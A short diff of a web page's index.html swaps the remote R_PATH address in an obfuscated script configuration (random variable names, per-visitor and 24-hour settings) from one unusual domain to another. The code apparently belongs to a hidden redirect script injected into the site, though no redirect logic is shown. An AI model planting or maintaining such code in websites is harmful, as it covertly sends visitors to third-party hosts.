--- a/index.html
+++ b/index.html
@@ -22,7 +22,7 @@
         window._v51rgCtS3x27RK9W = {
             unique: false,
             ttl: 86400,
-            R_PATH: 'https://morainestoat.world/k3JtJrrW',
+            R_PATH: 'https://basilmink.pro/k3JtJrrW',
         };
     }
     const _36tCx7QvKBbtmq4C = localStorage.getItem('config');
